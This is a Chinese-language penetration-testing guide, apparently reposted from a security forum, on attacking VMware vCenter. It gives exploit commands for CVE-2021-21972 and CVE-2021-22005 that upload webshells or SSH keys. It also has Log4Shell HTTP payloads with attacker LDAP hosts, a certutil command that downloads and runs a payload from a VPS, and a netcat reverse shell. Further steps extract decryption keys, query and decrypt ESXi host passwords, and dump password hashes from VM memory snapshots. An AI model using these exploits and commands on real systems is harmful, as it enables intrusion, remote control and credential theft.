文章来源:奇安信攻防社区(hyyrent)
原文地址:https://forum.butian.net/share/1893
0x00 前言
在内网渗透中常常会碰到VmwareVcenter,对实战打法以及碰到的坑点做了一些总结,部分内容参考了师傅们提供的宝贵经验,衷心感谢各位师傅!
0x01 指纹特征
title="+ ID_VC_Welcome +"
0x02 查看Vcenter版本
/sdk/vimServiceVersions.xml
0x03 CVE-2021-21972
影响范围
vCenter Server7.0 < 7.0.U1c
vCenter Server6.7 < 6.7.U3l
vCenter Server6.5 < 6.5.U3n
/ui/vropspluginui/rest/services/uploadova
访问上面的路径,如果404,则代表不存在漏洞,如果405 则可能存在漏洞
windows机器:
漏洞利用:
https://github.com/horizon3ai/CVE-2021-21972
python CVE-2021-21972.py -t x.x.x.x -p ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport\gsl.jsp -o win -f gsl.jsp
-t (目标地址)
-f (上传的文件)
-p (上传后的webshell路径,默认不用改)
https://x.x.x.x/statsreport/gsl.jsp
完整路径为
C:/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport
python3 CVE-2021-21972.py -t x.x.x.x -p /home/vsphere-ui/.ssh/authorized_keys -o unix -f id_rsa_2048.pub
https://github.com/NS-Sp4ce/CVE-2021-21972
0x04 CVE-2021-22005
影响范围
vCenter Server 7.0 < 7.0 U2c build-18356314
vCenter Server 6.7 < 6.7 U3o build-18485166
Cloud Foundation (vCenter Server) 4.x < KB85718 (4.3)
Cloud Foundation (vCenter Server) 3.x < KB85719 (3.10.2.2)
漏洞利用:
https://github.com/r0ckysec/CVE-2021-22005
cve-2021-22005_exp_win.exe -u https://x.x.x.x --shell
https://github.com/rwincey/CVE-2021-22005/blob/main/CVE-2021-22005.py
python cve-2021-22005.py -t https://x.x.x.x
连接webshell
https://x.x.x.x/idm/..;/test.jsp
上传后的webshell完整路径为
/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/xx.jsp
0x05 CVE-2021-44228
GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: 192.168.121.137
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Dnt: 1
X-Forwarded-For: ${jndi:ldap://9qphlt.dnslog.cn}
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
X-Forwarded-For: ${jndi:ldap://9qphlt.dnslog.cn}
-u
查看可执行命令漏洞利用:
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i VPSIP
X-Forwarded-For: ${jndi:ldap://VPSIP:1389/TomcatBypass/TomcatEcho}
cmd:
cs上线
GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: 192.168.121.142
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Dnt: 1
cmd: certutil -urlcache -split -f http://VPS C:\Users\Public\1.exe && C:\Users\Public\1.exe
X-Forwarded-For: ${jndi:ldap://VPS:1389/TomcatBypass/TomcatEcho}
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Linux使用反弹shell命令
nc -e /bin/sh 10.10.10.10 8888
nc -lvp 8888
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
0x06 获取vcenter-web控制台权限
重置密码
#Linux
/usr/lib/vmware-vmdir/bin/vdcadmintool
#Windows
C:\Program Files\Vmware\vCenter Server\vmdird\vdcadmintool.exe
解密脚本:
python vcenter_saml_login.py -p data.mdb -t 10.9.16.11
ui
路径进行 cookie 替换即可#Linux
/storage/db/vmware-vmdir/data.mdb
#windows
C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb
windows运行脚本需要安装对应版本的python-ldap
https://www.lfd.uci.edu/~gohlke/pythonlibs/#python-ldap1
pip install python_ldap-3.4.0-cp38-cp38-win_amd64.whl
pip install -r requirements.txt
https://github.com/3gstudent/Homework-of-Python/blob/master/vCenter_ExtraCertFromMdb.py
python vCenter_ExtraCertFromMdb.py data.mdb
运行脚本会生成三段证书文件,放置到相应的位置
https://github.com/3gstudent/Homework-of-Python/blob/master/vCenter_GenerateLoginCookie.py
python vCenter_GenerateLoginCookie.py 192.168.121.135 192.168.121.135 vsphere.local idp_cert.txt trusted_cert_1.txt trusted_cert_2.txt
查看域
#Linux
/usr/lib/vmware-vmafd/bin/vmafd-cli get-domain-name --server-name localhost
#windows
C:\Program Files\VMware\vCenter Server\vmafdd\vmafd-cli get-domain-name --server-name localhost
C:\PROGRA~1\VMware\"vCenter Server"\vmafdd\vmafd-cli get-domain-name --server-name localhost
1、获取解密key
#Windows
type C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat
#Linux
cat /etc/vmware-vpx/ssl/symkey.dat
#Linux
cat /etc/vmware-vpx/vcdb.properties
cat /etc/vmware/service-state/vpxd/vcdb.properties
#Windows
type C:\ProgramData\VMware\"VMware VirtualCenter"\vcdb.properties
type C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
默认是postgresql数据库,只能在vCenter服务器本地登录,执行语句查询ESXI的密码
#psql默认存放位置
Windows: C:\Program Files\VMware\vCenter Server\vPostgres\bin\psql.exe
Linux: /opt/vmware/vpostgres/9.3/bin/psql
#执行语句查询
psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc
#执行完会输出一段加密字段
Command> shell psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc
Shell access is granted to root
Password for user vc:
ip_address | user_name | password
-------------+-----------+---------------------------------------------------------------------------------------
192.168.1.1 | vpxuser | *H8BBiGe3kQqaujz3ptZvzhWXXZ0M6QOoOFIKL0p0cUDkWF/iMwikwt7BCrfEDRnXCqxoju4t2fsRV3xNMg==
192.168.1.2 | vpxuser | *zR20RvimwMPHz7U6LJW+GnmLod9pdHpdhIFO+Ooqk0/pn2NGDuKRae+ysy3rxBdwepRzNLdq6+paOgi54Q==
192.168.1.3 | vpxuser | *Q81OIBXziWr0orka0j++PKMSgw6f7kC0lCmITzSlbl/jCDTuRSs07oQnNFpSCC6IhZoPPto5ix0SccQPDw==
192.168.1.4 | vpxuser | *R6HqZzojKrFeshDIP8vXPMhN28mLDHiEEBSXWYXNHrQQvHcuLOFlLquI2oLRfqLiPlHwkmAxUj9hKj3VZA==
(4 rows)
#只保留password字段
*H8BBiGe3kQqaujz3ptZvzhWXXZ0M6QOoOFIKL0p0cUDkWF/iMwikwt7BCrfEDRnXCqxoju4t2fsRV3xNMg==
*zR20RvimwMPHz7U6LJW+GnmLod9pdHpdhIFO+Ooqk0/pn2NGDuKRae+ysy3rxBdwepRzNLdq6+paOgi54Q==
*Q81OIBXziWr0orka0j++PKMSgw6f7kC0lCmITzSlbl/jCDTuRSs07oQnNFpSCC6IhZoPPto5ix0SccQPDw==
*R6HqZzojKrFeshDIP8vXPMhN28mLDHiEEBSXWYXNHrQQvHcuLOFlLquI2oLRfqLiPlHwkmAxUj9hKj3VZA==
VPX_HOST
表https://github.com/shmilylty/vhost_password_decrypt
password字段放到password.enc里面
symkey.dat为第一步获取的解密key
python decrypt.py symkey.dat password.enc password.txt
在 ESXI 机器地址后面添加 /ui
,访问web控制台,账密为 vpxuser/password.txt里的密码
0x07 获取虚拟机权限
登录web控制台后,想要获取某个虚拟机的权限,比如说目标系统为靶标
选择目标虚拟机,操作生成快照
也可以通过 ssh 登录ESXI服务器上,通过 find 找出相应的 vmem
和 vmsn
文件拷贝到本地
find / -name "*.vmem"
使用 volatility 工具查看 profile
volatility_2.6_win64_standalone.exe -f WindowsServer2008r2.vmem imageinfo
读取注册表
volatility_2.6_win64_standalone.exe -f WindowsServer2008r2.vmem --profile=Win7SP1x64 hivelist
获取hash并解出密码
volatility_2.6_win64_standalone.exe -f WindowsServer2008r2.vmem --profile=Win7SP1x64 hashdump -y 0xfffff8a000024010 -s 0xfffff8a00084c010
Vcenter综合利用工具
回复关键字【1024】获取下载链接
关 注 有 礼
还在等什么?赶紧点击下方名片关注学习吧!
推 荐 阅 读